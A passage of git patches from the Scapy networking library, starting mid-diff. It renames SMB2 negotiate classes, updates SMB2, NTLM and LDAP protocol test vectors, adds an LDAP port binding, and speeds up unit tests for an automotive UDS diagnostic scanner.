0x0001: "IS_GUEST", + 0x0002: "IS_NULL", + 0x0004: "ENCRYPT_DATE", + }), + XLEShortField("SecurityBufferOffset", None), + FieldLenField( + "SecurityLen", None, + fmt=" bytes + return _SMB2_post_build(self, pkt, self.OFFSET, { + "Security": 4, + }) + pay + + +bind_top_down( + SMB2_Header, + SMB2_Session_Setup_Response, + Command=0x0001, + Flags=1 # SMB2_FLAGS_SERVER_TO_REDIR ) diff --git a/test/fields.uts b/test/fields.uts index 06381d5ab54..1a770f00b11 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -1587,17 +1587,20 @@ assert a.sprintf("%flags%") == "FS" class FlagsTest2(Packet): fields_desc = [ FlagsField("flags", 0x2, 16, { - 0: "A", # 0 bit - 7: "B" # 7 bit + 0x0001: "A", + 0x0008: "B", + 0x1000: "C", }) ] -a = FlagsTest2(flags=255) +a = FlagsTest2(flags=9) a.sprintf("%flags%") assert a.flags.A assert a.flags.B -assert a.sprintf("%flags%") == "A+bit_1+bit_2+bit_3+bit_4+bit_5+bit_6+B" +assert a.sprintf("%flags%") == "A+B" +b = FlagsTest2(flags="B+C") +assert b.flags == 0x1000 | 0x0008 ######## ######## diff --git a/test/scapy/layers/smb.uts b/test/scapy/layers/smb.uts index 357535dc644..d9823eeaced 100644 --- a/test/scapy/layers/smb.uts +++ b/test/scapy/layers/smb.uts @@ -114,14 +114,12 @@ assert smb_sax_req_2.AndXCommand == 255 assert smb_sax_req_2.SecurityBlob.token.negResult == 1 ntlm_authenticate = NTLM_Header(smb_sax_req_2.SecurityBlob.token.responseToken.value.val) assert isinstance(ntlm_authenticate, NTLM_AUTHENTICATE) -assert len(ntlm_authenticate.Payload) == 6 -assert ntlm_authenticate.Payload[0] == ('DomainName', '') -assert ntlm_authenticate.Payload[1] == ('UserName', '') -assert ntlm_authenticate.Payload[2] == ('Workstation', 'DESKTOP-V1FA0UQ') -assert ntlm_authenticate.Payload[3][0] == 'LmChallengeResponse' -assert isinstance(ntlm_authenticate.Payload[3][1], LMv2_RESPONSE) -assert ntlm_authenticate.Payload[4][0] == 'NtChallengeResponse' -assert ntlm_authenticate.Payload[4][1].AvPairs[0].sprintf("%AvId%") == 'MsvAvEOL' +assert len(ntlm_authenticate.Payload) == 3 +assert ntlm_authenticate.Payload[0] == ('Workstation', 'DESKTOP-V1FA0UQ') +assert ntlm_authenticate.Payload[1][0] == 'LmChallengeResponse' +assert isinstance(ntlm_authenticate.Payload[1][1], LMv2_RESPONSE) +assert ntlm_authenticate.Payload[2][0] == 'EncryptedRandomSessionKey' +assert ntlm_authenticate.Payload[2][1] == b'/\t\x13+\x81\xa6\x15\x14\xb9\x11\x8b\xe0\x00\x88\xd7\x1f' = SMB Setup AndX Response - accept complete (ES) diff --git a/test/scapy/layers/smb2.uts b/test/scapy/layers/smb2.uts index a7a9a757a59..cb6d5f7bed1 100644 --- a/test/scapy/layers/smb2.uts +++ b/test/scapy/layers/smb2.uts @@ -12,19 +12,18 @@ assert pkt[NBTSession].LENGTH == 236 assert SMB2_Header in pkt smb2 = pkt[SMB2_Header] # Check header values -print(smb2.show()) + assert smb2.Start == b'\xfeSMB' -assert smb2.HeaderLength == 64 +assert smb2.StructureSize == 64 assert smb2.CreditCharge == 1 assert smb2.ChannelSequence == 0 assert smb2.Command == 0 assert smb2.CreditsRequested == 0 assert smb2.Flags == 0 -assert smb2.ChainOffset == 0 -assert smb2.MessageID == 0 -assert smb2.ProcessID == 0 -assert smb2.TreeID == 0 -assert smb2.SessionID == 0 +assert smb2.NextCommand == 0 +assert smb2.MessageId == 0 +assert smb2.AsyncID == 0 +assert smb2.SessionId == 0 assert smb2.Signature == 0xffeeddccbbaa99887766554433221100 # KO test @@ -55,7 +54,7 @@ assert pkt[NBTSession].TYPE == 0x00 # session message smb2 = pkt[SMB2_Header] assert smb2.Start == b'\xfeSMB' -+ SMB2 Negociate Procotol Request Header dissecting ++ SMB2 Negotiate Procotol Request Header dissecting = Common fields in header @@ -67,16 +66,16 @@ assert TCP in pkt assert NBTSession in pkt assert pkt[NBTSession].LENGTH == 236 assert SMB2_Header in pkt -assert SMB2_Negociate_Protocol_Request_Header in pkt -nego_req = pkt[SMB2_Negociate_Protocol_Request_Header] +assert SMB2_Negotiate_Protocol_Request in pkt +nego_req = pkt[SMB2_Negotiate_Protocol_Request] # Check field values assert nego_req.StructureSize == 0x24 assert nego_req.DialectCount == 4 assert nego_req.SecurityMode == 0 -assert nego_req.Capabilities == 0x7f000000 +assert nego_req.Capabilities == 0x7f assert str(nego_req.ClientGUID) == 'f1849e59-619d-99ce-1f50-5c044474b10a' -assert nego_req.NegociateContextOffset == 0x70 -assert nego_req.NegociateCount == 4 +assert nego_req.NegotiateContextOffset == 0x70 +assert nego_req.NegotiateCount == 4 for dialect in nego_req.Dialects: assert dialect in SMB_DIALECTS.keys() @@ -88,11 +87,11 @@ assert 0x300 in nego_req.Dialects assert 0x302 in nego_req.Dialects # Check SMB 3.1.1 assert 0x311 in nego_req.Dialects -assert len(nego_req.NegociateContexts) == nego_req.NegociateCount +assert len(nego_req.NegotiateContexts) == nego_req.NegotiateCount -= SMB2 Negociate Context in Request - type PREAUTH - disassemble += SMB2 Negotiate Context in Request - type PREAUTH - disassemble -preauth = nego_req.NegociateContexts[0] +preauth = nego_req.NegotiateContexts[0] assert preauth.ContextType == 0x1 assert preauth.DataLength == 38 assert preauth.HashAlgorithmCount == 1 @@ -101,9 +100,9 @@ assert preauth.Salt == b'\x75\x06\x05\xed\x60\x88\x9e\xcb\x5e\x79\xbb\xe8\x44\x5 assert len(preauth.HashAlgorithms) == 1 assert preauth.HashAlgorithms[0] == 0x1 -= SMB2 Negociate Context in Request - type ENCRYPTION disassemble += SMB2 Negotiate Context in Request - type ENCRYPTION disassemble -enc = nego_req.NegociateContexts[1] +enc = nego_req.NegotiateContexts[1] assert enc.ContextType == 0x2 assert enc.DataLength == 6 assert enc.CipherCount == 2 @@ -112,9 +111,9 @@ assert enc.Ciphers[0] == 1 assert enc.Ciphers[1] == 2 -= SMB2 Negociate Context in Request - type COMPRESSION += SMB2 Negotiate Context in Request - type COMPRESSION -comp = nego_req.NegociateContexts[2] +comp = nego_req.NegotiateContexts[2] assert comp.ContextType == 0x3 assert comp.DataLength == 16 assert comp.CompressionAlgorithmCount == 4 @@ -125,28 +124,28 @@ assert comp.CompressionAlgorithms[2] == 3 assert comp.CompressionAlgorithms[3] == 4 -= SMB2 Negociate Context in Request - type NETNAME NEGOCIATE += SMB2 Negotiate Context in Request - type NETNAME NEGOCIATE -netname = nego_req.NegociateContexts[3] +netname = nego_req.NegotiateContexts[3] assert netname.ContextType == 0x5 assert netname.DataLength == 28 assert netname.NetName == '192.168.178.21' -= test SMB2 Negociate Protocol Request Header - assembling += test SMB2 Negotiate Protocol Request Header - assembling -pkt = IP() / TCP() / NBTSession() / SMB2_Header() / SMB2_Negociate_Protocol_Request_Header() +pkt = IP() / TCP() / NBTSession() / SMB2_Header() / SMB2_Negotiate_Protocol_Request() pkt = IP(raw(pkt)) -assert SMB2_Negociate_Protocol_Request_Header in pkt +assert SMB2_Negotiate_Protocol_Request in pkt = Request with no 0x0311 in dialects preauth = SMB2_Preauth_Integrity_Capabilities() -preauth_context = SMB2_Negociate_Context(ContextType = 1, DataLength = len(preauth)) / preauth +preauth_context = SMB2_Negotiate_Context(ContextType = 1, DataLength = len(preauth)) / preauth -pkt = SMB2_Negociate_Protocol_Request_Header(Dialects=[0x0202], NegociateContexts=[preauth_context]) -assert pkt.__class__(raw(pkt)).NegociateContexts is None +pkt = SMB2_Negotiate_Protocol_Request(Dialects=[0x0202], NegotiateContexts=[preauth_context]) +assert pkt.__class__(raw(pkt)).NegotiateContexts is None -+ SMB2 Negociate Protocol Response Header dissecting ++ SMB2 Negotiate Protocol Response Header dissecting = Common fields in header @@ -157,30 +156,30 @@ assert TCP in pkt assert NBTSession in pkt assert pkt[NBTSession].LENGTH == 530 assert SMB2_Header in pkt -assert SMB2_Negociate_Protocol_Response_Header in pkt -nego_resp = pkt[SMB2_Negociate_Protocol_Response_Header] +assert SMB2_Negotiate_Protocol_Response in pkt +nego_resp = pkt[SMB2_Negotiate_Protocol_Response] # check field values -print(nego_resp.show()) + print(repr(nego_resp.SecurityMode)) print(dir(nego_resp.SecurityMode)) assert nego_resp.StructureSize == 0x41 -assert str(nego_resp.SecurityMode) == 'Signing Enabled' -assert nego_resp.Dialect == 0x0311 -assert nego_resp.NegociateCount == 0x3 +assert str(nego_resp.SecurityMode) == 'Signing Required' +assert nego_resp.DialectRevision == 0x0311 +assert nego_resp.NegotiateCount == 0x3 assert str(nego_resp.ServerGUID) == '1cdd6d53-1f30-4244-a5c8-88737a6805e1' -assert nego_resp.Capabilities == 0x2f000000 +assert nego_resp.Capabilities == 0x2f assert nego_resp.MaxTransactionSize == 0x00800000 assert nego_resp.MaxReadSize == 0x00800000 assert nego_resp.MaxWriteSize == 0x00800000 -assert nego_resp.SecurityBufferOffset == 0x00000080 -assert nego_resp.SecurityBufferLength == 320 -assert nego_resp.NegociateContextOffset == 0x1c0 -assert nego_resp.SecurityBuffer == b"`\x82\x01<\x06\x06+\x06\x01\x05\x05\x02\xa0\x82\x0100\x82\x01,\xa0\x1a0\x18\x06\n+\x06\x01\x04\x01\x827\x02\x02\x1e\x06\n+\x06\x01\x04\x01\x827\x02\x02\n\xa2\x82\x01\x0c\x04\x82\x01\x08NEGOEXTS\x01\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00p\x00\x00\x00\x11p\xff\xd0\xfa\xf1O\xa2o@\\\x94UhS\xcf\xa1w\x02z2\xa9bx\n!\xfb\x9e,^\xe9x\xeb\xab\xee\x91\xfd\xfc\xda\x0f\xc5\x91\x03n\xf8\xfdL\x08\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\3S\r\xea\xf9\rM\xb2\xecJ\xe3xn\xc3\x08NEGOEXTS\x03\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\x98\x00\x00\x00\x11p\xff\xd0\xfa\xf1O\xa2o@\\\x94UhS\xcf\\3S\r\xea\xf9\rM\xb2\xecJ\xe3xn\xc3\x08@\x00\x00\x00X\x00\x00\x000V\xa0T0R0'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key0'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key" -assert len(nego_resp.NegociateContexts) == 3 +assert nego_resp.SecurityBlobOffset == 0x00000080 +assert nego_resp.SecurityBlobLength == 320 +assert nego_resp.NegotiateContextOffset == 0x1c0 +assert nego_resp.SecurityBlob.innerContextToken.token.mechToken.value.val == b"NEGOEXTS\x01\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00p\x00\x00\x00\x11p\xff\xd0\xfa\xf1O\xa2o@\\\x94UhS\xcf\xa1w\x02z2\xa9bx\n!\xfb\x9e,^\xe9x\xeb\xab\xee\x91\xfd\xfc\xda\x0f\xc5\x91\x03n\xf8\xfdL\x08\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\3S\r\xea\xf9\rM\xb2\xecJ\xe3xn\xc3\x08NEGOEXTS\x03\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\x98\x00\x00\x00\x11p\xff\xd0\xfa\xf1O\xa2o@\\\x94UhS\xcf\\3S\r\xea\xf9\rM\xb2\xecJ\xe3xn\xc3\x08@\x00\x00\x00X\x00\x00\x000V\xa0T0R0'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key0'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key" +assert len(nego_resp.NegotiateContexts) == 3 -= SMB2 Negociate Context in Response - Type PREAUTH += SMB2 Negotiate Context in Response - Type PREAUTH -preauth = nego_resp.NegociateContexts[0] +preauth = nego_resp.NegotiateContexts[0] assert preauth.ContextType == 0x0001 assert preauth.DataLength == 38 assert preauth.HashAlgorithmCount == 1 @@ -189,39 +188,39 @@ assert preauth.Salt == b"\x09\x33\xe9\xe8\xcb\xf4\x8a\x5c\x61\x4d\x38\x42\xa1\x5 assert len(preauth.HashAlgorithms) == 1 assert preauth.HashAlgorithms[0] == 0x1 -= SMB2 Negociate Context in Response - Type ENCRYPTION += SMB2 Negotiate Context in Response - Type ENCRYPTION -enc = nego_resp.NegociateContexts[1] +enc = nego_resp.NegotiateContexts[1] assert enc.ContextType == 0x0002 assert enc.DataLength == 4 assert enc.CipherCount == 1 assert len(enc.Ciphers) == 1 assert enc.Ciphers[0] == 1 -= SMB2 Negociate Context in Response - Type COMPRESSION += SMB2 Negotiate Context in Response - Type COMPRESSION -comp = nego_resp.NegociateContexts[2] +comp = nego_resp.NegotiateContexts[2] assert comp.ContextType == 0x0003 assert comp.DataLength == 10 assert comp.CompressionAlgorithmCount == 1 assert len(comp.CompressionAlgorithms) == 1 assert comp.CompressionAlgorithms[0] == 1 -= SMB2 Negociate Protocol Response Header assembling += SMB2 Negotiate Protocol Response Header assembling -pkt = IP() / TCP() / NBTSession() / SMB2_Header() / SMB2_Negociate_Protocol_Response_Header() +pkt = IP() / TCP() / NBTSession() / SMB2_Header() / SMB2_Negotiate_Protocol_Response() pkt = IP(raw(pkt)) -assert SMB2_Negociate_Protocol_Response_Header in pkt +assert SMB2_Negotiate_Protocol_Response in pkt = Response with dialect different from 0x0311 preauth = SMB2_Preauth_Integrity_Capabilities() -preauth_context = SMB2_Negociate_Context(ContextType = 1, DataLength = len(preauth)) / preauth +preauth_context = SMB2_Negotiate_Context(ContextType = 1, DataLength = len(preauth)) / preauth -pkt = SMB2_Negociate_Protocol_Response_Header(Dialect=0x0202, NegociateContexts=[preauth_context]) -assert pkt.__class__(raw(pkt)).NegociateContexts is None +pkt = SMB2_Negotiate_Protocol_Response(DialectRevision=0x0202, NegotiateContexts=[preauth_context]) +assert pkt.__class__(raw(pkt)).NegotiateContexts is None -+ SMB2 Negociate Procotol Request Header with 1 dialect ++ SMB2 Negotiate Procotol Request Header with 1 dialect = Common fields in header @@ -233,26 +232,26 @@ assert TCP in pkt assert NBTSession in pkt assert pkt[NBTSession].LENGTH == 228 assert SMB2_Header in pkt -assert SMB2_Negociate_Protocol_Request_Header in pkt -nego_req = pkt[SMB2_Negociate_Protocol_Request_Header] +assert SMB2_Negotiate_Protocol_Request in pkt +nego_req = pkt[SMB2_Negotiate_Protocol_Request] # Check field values assert nego_req.StructureSize == 0x24 assert nego_req.DialectCount == 1 assert nego_req.SecurityMode == 0 -assert nego_req.Capabilities == 0x7f000000 +assert nego_req.Capabilities == 0x7f assert str(nego_req.ClientGUID) == 'f1849e59-619d-99ce-1f50-5c044474b10a' -assert nego_req.NegociateContextOffset == 0x68 -assert nego_req.NegociateCount == 4 +assert nego_req.NegotiateContextOffset == 0x68 +assert nego_req.NegotiateCount == 4 for dialect in nego_req.Dialects: assert dialect in SMB_DIALECTS.keys() # Check SMB 3.1.1 assert 0x311 in nego_req.Dialects -assert len(nego_req.NegociateContexts) == nego_req.NegociateCount +assert len(nego_req.NegotiateContexts) == nego_req.NegotiateCount -= SMB2 Negociate Context in Request - type PREAUTH - disassemble += SMB2 Negotiate Context in Request - type PREAUTH - disassemble -preauth = nego_req.NegociateContexts[0] +preauth = nego_req.NegotiateContexts[0] assert preauth.ContextType == 0x1 assert preauth.DataLength == 38 assert preauth.HashAlgorithmCount == 1 @@ -261,9 +260,9 @@ assert preauth.Salt == b'\x75\x06\x05\xed\x60\x88\x9e\xcb\x5e\x79\xbb\xe8\x44\x5 assert len(preauth.HashAlgorithms) == 1 assert preauth.HashAlgorithms[0] == 0x1 -= SMB2 Negociate Context in Request - type ENCRYPTION disassemble += SMB2 Negotiate Context in Request - type ENCRYPTION disassemble -enc = nego_req.NegociateContexts[1] +enc = nego_req.NegotiateContexts[1] assert enc.ContextType == 0x2 assert enc.DataLength == 6 assert enc.CipherCount == 2 @@ -272,9 +271,9 @@ assert enc.Ciphers[0] == 1 assert enc.Ciphers[1] == 2 -= SMB2 Negociate Context in Request - type COMPRESSION += SMB2 Negotiate Context in Request - type COMPRESSION -comp = nego_req.NegociateContexts[2] +comp = nego_req.NegotiateContexts[2] assert comp.ContextType == 0x3 assert comp.DataLength == 16 assert comp.CompressionAlgorithmCount == 4 @@ -285,51 +284,51 @@ assert comp.CompressionAlgorithms[2] == 3 assert comp.CompressionAlgorithms[3] == 4 -= SMB2 Negociate Context in Request - type NETNAME NEGOCIATE += SMB2 Negotiate Context in Request - type NETNAME NEGOCIATE -netname = nego_req.NegociateContexts[3] +netname = nego_req.NegotiateContexts[3] assert netname.ContextType == 0x5 assert netname.DataLength == 28 assert netname.NetName == '192.168.178.21' -+ SMB2 Negociate Protocol Request Header default values ++ SMB2 Negotiate Protocol Request Header default values = Default DialectCount -pkt = SMB2_Negociate_Protocol_Request_Header() +pkt = SMB2_Negotiate_Protocol_Request() assert len(pkt.Dialects) == pkt.__class__(raw(pkt)).DialectCount -= Default NegociateCount += Default NegotiateCount preauth = SMB2_Preauth_Integrity_Capabilities() -preauth_context = SMB2_Negociate_Context(ContextType = 1, DataLength = len(preauth)) / preauth +preauth_context = SMB2_Negotiate_Context(ContextType = 1, DataLength = len(preauth)) / preauth -pkt = SMB2_Negociate_Protocol_Request_Header(Dialects=[0x0311], NegociateContexts=[preauth_context], NegociateContextOffset=0x68) -assert len(pkt.NegociateContexts) == pkt.__class__(raw(pkt)).NegociateCount +pkt = SMB2_Negotiate_Protocol_Request(Dialects=[0x0311], NegotiateContexts=[preauth_context], NegotiateContextOffset=0x68) +assert len(pkt.NegotiateContexts) == pkt.__class__(raw(pkt)).NegotiateCount -+ Negociate Request without manual padding of Negociate Contexts ++ Negotiate Request without manual padding of Negotiate Contexts -= SMB2 Negociate Context in Request - type PREAUTH - disassemble += SMB2 Negotiate Context in Request - type PREAUTH - disassemble preauth = SMB2_Preauth_Integrity_Capabilities() -preauth_context = SMB2_Negociate_Context(ContextType = 1, DataLength = len(preauth)) / preauth +preauth_context = SMB2_Negotiate_Context(ContextType = 1, DataLength = len(preauth)) / preauth enc = SMB2_Encryption_Capabilities() -enc_context = SMB2_Negociate_Context(ContextType = 2, DataLength = len(enc)) / enc +enc_context = SMB2_Negotiate_Context(ContextType = 2, DataLength = len(enc)) / enc comp = SMB2_Compression_Capabilities() -comp_context = SMB2_Negociate_Context(ContextType = 3, DataLength = len(comp)) / comp +comp_context = SMB2_Negotiate_Context(ContextType = 3, DataLength = len(comp)) / comp -netname = SMB2_Netname_Negociate_Context_ID("192.168.178.21".encode("utf-16le")) -netname_context = SMB2_Negociate_Context(ContextType = 5, DataLength = len(netname)) / netname +netname = SMB2_Netname_Negotiate_Context_ID("192.168.178.21".encode("utf-16le")) +netname_context = SMB2_Negotiate_Context(ContextType = 5, DataLength = len(netname)) / netname -pkt = SMB2_Header() / SMB2_Negociate_Protocol_Request_Header(Dialects=[0x0311], NegociateContexts=[preauth_context, enc_context, comp_context, netname_context], NegociateContextOffset=0x68) +pkt = SMB2_Header() / SMB2_Negotiate_Protocol_Request(Dialects=[0x0311], NegotiateContexts=[preauth_context, enc_context, comp_context, netname_context], NegotiateContextOffset=0x68) pkt = SMB2_Header(raw(pkt)) -nego_req = pkt[SMB2_Negociate_Protocol_Request_Header] +nego_req = pkt[SMB2_Negotiate_Protocol_Request] -preauth_dissected = nego_req.NegociateContexts[0] +preauth_dissected = nego_req.NegotiateContexts[0] assert preauth_dissected.ContextType == preauth_context.ContextType assert preauth_dissected.DataLength == preauth_context.DataLength assert preauth_dissected.HashAlgorithmCount == preauth_context.HashAlgorithmCount @@ -337,26 +336,46 @@ assert preauth_dissected.SaltLength == preauth_context.SaltLength assert len(preauth_dissected.HashAlgorithms) == len(preauth_context.HashAlgorithms) assert preauth_dissected.HashAlgorithms[0] == preauth_context.HashAlgorithms[0] -= SMB2 Negociate Context in Request - type ENCRYPTION disassemble += SMB2 Negotiate Context in Request - type ENCRYPTION disassemble -enc_dissected = nego_req.NegociateContexts[1] +enc_dissected = nego_req.NegotiateContexts[1] assert enc_dissected.ContextType == enc_context.ContextType assert enc_dissected.DataLength == enc_context.DataLength assert enc_dissected.CipherCount == enc_context.CipherCount assert len(enc_dissected.Ciphers) == len(enc_context.Ciphers) assert enc_dissected.Ciphers[0] == enc_context.Ciphers[0] -= SMB2 Negociate Context in Request - type COMPRESSION += SMB2 Negotiate Context in Request - type COMPRESSION -comp_dissected = nego_req.NegociateContexts[2] +comp_dissected = nego_req.NegotiateContexts[2] assert comp_dissected.ContextType == comp_context.ContextType assert comp_dissected.DataLength == comp_context.DataLength assert comp_dissected.CompressionAlgorithmCount == comp_context.CompressionAlgorithmCount assert len(comp_dissected.CompressionAlgorithms) == len(comp_context.CompressionAlgorithms) -= SMB2 Negociate Context in Request - type NETNAME NEGOCIATE += SMB2 Negotiate Context in Request - type NETNAME NEGOCIATE -netname_dissected = nego_req.NegociateContexts[3] +netname_dissected = nego_req.NegotiateContexts[3] assert netname_dissected.ContextType == netname_context.ContextType assert netname_dissected.DataLength == netname_context.DataLength assert netname_dissected.NetName == netname_context.NetName + ++ SMB 2 Setup Session + += Setup Session Request + +from scapy.layers.ntlm import * + +setup_sess = NBTSession(b'\x00\x00\x00\xa2\xfeSMB@\x00\x01\x00\x00\x00\x00\x00\x01\x00!\x00\x10\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00X\x00J\x00\x00\x00\x00\x00\x00\x00\x00\x00`H\x06\x06+\x06\x01\x05\x05\x02\xa0>0<\xa0\x0e0\x0c\x06\n+\x06\x01\x04\x01\x827\x02\x02\n\xa2*\x04(NTLMSSP\x00\x01\x00\x00\x00\x97\x82\x08\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00aJ\x00\x00\x00\x0f') +assert isinstance(setup_sess.Buffer[0][1].innerContextToken.token.mechToken.value, NTLM_NEGOTIATE) +assert setup_sess.Buffer[0][1].innerContextToken.token.mechToken.value.ProductBuild == 19041 + += Setup Session Response + +from scapy.layers.ntlm import * + +setup_sess = NBTSession(b'\x00\x00\x00\xe7\xfeSMB@\x00\x01\x00\x16\x00\x00\xc0\x01\x00\x01\x00\x11\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00H\x00\x9f\x00\xa1\x81\x9c0\x81\x99\xa0\x03\n\x01\x01\xa1\x0c\x06\n+\x06\x01\x04\x01\x827\x02\x02\n\xa2\x81\x83\x04\x81\x80NTLMSSP\x00\x02\x00\x00\x00\x08\x00\x08\x008\x00\x00\x00\x15\x82\x8a\xe2\xe0\x14\xe7\xbf\xfd@\x01+\x00\x00\x00\x00\x00\x00\x00\x00@\x00@\x00@\x00\x00\x00\n\x00aJ\x00\x00\x00\x0fW\x00I\x00N\x001\x00\x02\x00\x08\x00W\x00I\x00N\x001\x00\x01\x00\x08\x00W\x00I\x00N\x001\x00\x04\x00\x08\x00W\x00I\x00N\x001\x00\x03\x00\x08\x00W\x00I\x00N\x001\x00\x07\x00\x08\x00\xef\x1f\x0e\tE\xe6\xd7\x01\x00\x00\x00\x00') +assert isinstance(setup_sess.Buffer[0][1].token.responseToken.value, NTLM_CHALLENGE) +assert setup_sess.Buffer[0][1].token.responseToken.value +assert setup_sess.Buffer[0][1].token.responseToken.value.Payload[0] == ('TargetName', 'WIN1') +assert setup_sess.Buffer[0][1].token.responseToken.value.Payload[1][1][-1].AvId == 0 From d1a2f05c5abd30b656b83940e4057a7df3776c73 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 2 Dec 2021 11:27:28 +0100 Subject: [PATCH 0705/1632] Add LDAP port 3268 Co-authored-by: Pierre --- scapy/layers/ldap.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index b1bbe609f0f..8d7be10d198 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -421,6 +421,8 @@ def mysummary(self): bind_bottom_up(TCP, LDAP, dport=389) bind_bottom_up(TCP, LDAP, sport=389) +bind_bottom_up(TCP, LDAP, dport=3268) +bind_bottom_up(TCP, LDAP, sport=3268) bind_layers(TCP, LDAP, sport=389, dport=389) # CLDAP - rfc1798 From 37dab06167c3fab4765da6661a5dbe1f47d7bc12 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 8 Dec 2021 11:36:12 +0100 Subject: [PATCH 0706/1632] Fix LDAP test --- test/scapy/layers/ldap.uts | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/test/scapy/layers/ldap.uts b/test/scapy/layers/ldap.uts index 515a2647f59..351e7fe3a6a 100644 --- a/test/scapy/layers/ldap.uts +++ b/test/scapy/layers/ldap.uts @@ -30,10 +30,10 @@ assert isinstance(pkt[LDAP].protocolOp, LDAP_BindRequest) assert isinstance(pkt[LDAP].protocolOp.authentication, LDAP_SaslCredentials) ntlm = NTLM_Header(pkt[LDAP].protocolOp.authentication.credentials.val) assert isinstance(ntlm, NTLM_AUTHENTICATE_V2) -assert ntlm.Payload[1] == ('UserName', 'toto') -assert ntlm.Payload[2] == ('Workstation', 'WIN2') -assert isinstance(ntlm.Payload[4][1], NTLMv2_RESPONSE) -assert ntlm.Payload[4][1].AvPairs[8].Value == 'ldap/192.168.122.156' +assert ntlm.Payload[0] == ('UserName', 'toto') +assert ntlm.Payload[1] == ('Workstation', 'WIN2') +assert isinstance(ntlm.Payload[3][1], NTLMv2_RESPONSE) +assert ntlm.Payload[3][1].AvPairs[8].Value == 'ldap/192.168.122.156' = LDAP_BindResponse From 7b9d4143bbf35774d496c0590a5cac43ca87e894 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 2 Dec 2021 14:29:54 +0100 Subject: [PATCH 0707/1632] Speedup and fixes for UDS_Scanner unit tests --- scapy/contrib/automotive/uds_scan.py | 24 +++++++++++++++-- .../automotive/scanner/uds_scanner.uts | 26 +++++++++---------- test/testsocket.py | 4 +-- 3 files changed, 37 insertions(+), 17 deletions(-) diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index 27335177467..5a7c0ee639c 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -372,8 +372,23 @@ def __init__(self): class UDS_RDBIRandomEnumerator(UDS_RDBIEnumerator): + _supported_kwargs = copy.copy(UDS_RDBIEnumerator._supported_kwargs) + _supported_kwargs.update({ + 'probe_start': int, + 'probe_end': int + }) block_size = 2 ** 6 + _supported_kwargs_doc = UDS_RDBIEnumerator._supported_kwargs_doc + """ + :param int probe_start: Specifies the start identifier for probing. + :param int probe_end: Specifies the end identifier for probing.""" + + def execute(self, socket, state, **kwargs): + # type: (_SocketUnion, EcuState, Any) -> None + super(UDS_RDBIRandomEnumerator, self).execute(socket, state, **kwargs) + + execute.__doc__ = _supported_kwargs_doc + def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] @@ -395,7 +410,12 @@ def _get_initial_requests(self, **kwargs): } to_scan = [] block_size = UDS_RDBIRandomEnumerator.block_size - for block_index, start in enumerate(range(0, 2 ** 16, block_size)): + + probe_start = kwargs.pop("probe_start", 0) + probe_end = kwargs.pop("probe_end", 0x10000) + probe_range = range(probe_start, probe_end, block_size) + + for block_index, start in enumerate(probe_range): end = start + block_size count_samples = samples_per_block.get(block_index, 1) to_scan += random.sample(range(start, end), count_samples) @@ -837,7 +857,7 @@ class UDS_RMBARandomEnumerator(UDS_RMBAEnumeratorABC): _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ :param bool unittest: Enables smaller search space for unit-test - scenarios. This safes execution time.""" + scenarios. This saves execution time.""" def execute(self, socket, state, **kwargs): # type: (_SocketUnion, EcuState, Any) -> None diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 1a864663ca6..05ae97309cf 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -282,7 +282,7 @@ resps = [EcuResponse(None, [UDS()/UDS_RDBIPR(dataIdentifier=0x101)/Raw(b"asdfbee es = [UDS_RDBISelectiveEnumerator] -scanner = executeScannerInVirtualEnvironment(resps, es) +scanner = executeScannerInVirtualEnvironment(resps, es, UDS_RDBIRandomEnumerator_kwargs={"probe_start": 0, "probe_end": 0x500}) assert scanner.scan_completed tc = scanner.configuration.stages[0][0] @@ -293,7 +293,7 @@ assert len(tc.results_without_response) < 10 if tc.results_without_response: tc.show() -assert len(tc.results_with_negative_response) > 1000 +assert len(tc.results_with_negative_response) > 100 assert len(tc.results_with_positive_response) >= 1 assert len(tc.scanned_states) == 1 @@ -614,12 +614,12 @@ assert 3 in ids resps = [EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=1, routineIdentifier=1)/Raw(b"asdfbeef1")]), EcuResponse(None, [UDS()/UDS_RCPR(routineControlType=2, routineIdentifier=2)/Raw(b"beef2")]), 